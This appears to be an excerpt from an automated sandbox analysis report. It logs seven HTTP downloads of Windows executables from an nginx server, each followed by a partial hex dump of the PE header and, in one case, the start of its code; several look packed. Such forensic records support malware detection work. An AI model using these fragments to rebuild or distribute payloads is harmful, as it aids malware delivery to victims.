                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:21:01 GMTContent-Type: application/octet-streamContent-Length: 3008512Last-Modified: Thu, 19 Dec 2024 12:39:36 GMTConnection: keep-aliveETag: "67641408-2de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 90 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 31 00 00 04 00 00 78 8a 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 7b 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 7a 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 06 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6f 64 6f 67 6d 69 6f 69 00 d0 2a 00 00 b0 06 00 00 cc 2a 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 79 66 63 63 61 65 68 00 10 00 00 00 80 31 00 00 04 00 00 00 c2 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 31 00 00 22 00 00 00 c6 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:21:05 GMTContent-Type: application/octet-streamContent-Length: 765568Last-Modified: Tue, 17 Dec 2024 09:46:16 GMTConnection: keep-aliveETag: "67614868-bae80"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0b 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 02 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c a8 01 00 00 10 00 00 00 aa 01 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 24 8b 00 00 00 c0 01 00 00 8c 00 00 00 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 22 00 00 00 50 02 00 00 16 00 00 00 3e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 53 00 00 00 00 53 00 00 00 00 80 02 00 00 02 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 02 00 00 02 00 00 00 56 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 00 00 00 00 a0 02 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 40 19 00 00 00 b0 02 00 00 1a 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 86 04 00 00 d0 02 00 00 86 04 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 00 86 04 00 00 60 07 00 00 86 04 00 00 fa 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:21:42 GMTContent-Type: application/octet-streamContent-Length: 4442112Last-Modified: Thu, 19 Dec 2024 13:07:25 GMTConnection: keep-aliveETag: "67641a8d-43c800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 50 b5 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 b5 00 00 04 00 00 dc 32 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3a b5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 39 b5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 61 00 00 10 00 00 00 3e 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 80 61 00 00 02 00 00 00 4e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 61 00 00 02 00 00 00 50 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 38 00 00 a0 61 00 00 02 00 00 00 52 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 67 67 73 62 74 72 6d 00 50 1b 00 00 f0 99 00 00 4e 1b 00 00 54 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 6d 63 70 70 63 6b 6c 00 10 00 00 00 40 b5 00 00 04 00 00 00 a2 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 b5 00 00 22 00 00 00 a6 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:22:37 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0e 8e 01 00 00 10 00 00 00 90 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 da 3b 00 00 00 a0 01 00 00 3c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 4d 00 00 00 e0 01 00 00 0a 00 00 00 ce 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 10 4f 00 00 00 30 02 00 00 50 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 55 8b ec a1 60 e9 41 00 81 ec 04 09 00 00 53 33 db 3b c3 56 57 74 1f 66 39 1d 62 e9 41 00 74 07 ff d0 a3 60 e9 41 00 50 e8 50 14 00 00 50 e8 ef 84 00 00 59 eb 6e 6a 27 e8 40 14 00 00 8b 75 08 ff 76 0c 8b 3d c0 a2 41 00 ff 36 50 8d 85 fc f6 ff ff 50 ff d7 83 c4 14 39 5e 10 89 5d fc 76 38 8d 5e 14 ff 33 8d 85 fc fe ff ff 68 90 a4 41 00 50 ff d7 83 c4 0c 8d 85 fc fe ff ff 50 8d 85 fc f6 ff ff 50 ff 15 78 a1 41 00 ff 45 fc 8b 45 fc 83 c3 04 3b 46 10 72 cb 8d 85 fc f6 ff ff 50 e8 7e 84 00 00 59 e8 d4 36 00 00 6a 0a ff 15 74 a1 41 00 cc ff 74 24 04 e8 44 ff ff ff cc 56 8b f1 e8 25 73 00 00 c7 06 a0 a4 41 00 c7 46 38 d2 07 00 00 8b c6 5e c3 6a 01 ff 71 04 ff 15 bc a2 41 00 c3 33 c0 39 05 60 ea 41 00 74 07 b8 04 40 00 80 eb 1e 39 44 24 08 74 16 ff 74 24 08 50 68 02 80 00 00 ff 35 58 ea 41 00 ff 15 b8 a2 41 00 33 c0 c2 08 00 8b 44 24 04 83 60 1c 00 83 7c 24 08 00 75 07 c7 40 1c 01 00 00 00 33 c0 c2 08 00 a0 70 e9 41 00 f6 d8 1b c0 83 e0 0b 83 c0 08 c3 ff 74 24 10 8b 44 24 08 ff 74 24 10 c7 05 60 e9 41 00 2f 11 40 00 ff 74 24 10 8b 08 50 ff 51 0c 83 25 60 e9 41 00 00 c3 33 c0 c2 0c 00 8b 54 24 08 8b 4c 24 04 0f b7 02 66 89 01 41 41 42 42 66 85 c0 75 f1 c3 8b 4c 24 04 33 c0 66 39
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:26:41 GMTContent-Type: application/octet-streamContent-Length: 1865216Last-Modified: Thu, 19 Dec 2024 12:39:15 GMTConnection: keep-aliveETag: "676413f3-1c7600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ae 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 04 a2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2a 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 78 69 67 6e 74 62 65 00 00 1a 00 00 c0 2f 00 00 f2 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 64 6d 67 6b 63 6f 70 63 00 10 00 00 00 c0 49 00 00 04 00 00 00 50 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 54 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:26:49 GMTContent-Type: application/octet-streamContent-Length: 2940416Last-Modified: Thu, 19 Dec 2024 12:39:26 GMTConnection: keep-aliveETag: "676413fe-2cde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 10 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 40 50 00 00 04 00 00 37 0d 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6d 74 78 65 65 6b 76 6c 00 40 2b 00 00 c0 24 00 00 3c 2b 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 66 6d 71 6f 67 6c 63 00 10 00 00 00 00 50 00 00 04 00 00 00 b8 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 10 50 00 00 22 00 00 00 bc 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 19 Dec 2024 13:27:06 GMTContent-Type: application/octet-streamContent-Length: 971264Last-Modified: Thu, 19 Dec 2024 12:37:20 GMTConnection: keep-aliveETag: "67641380-ed200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 71 13 64 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 cf cb 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 88 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 88 67 01 00 00 40 0d 00 00 68 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
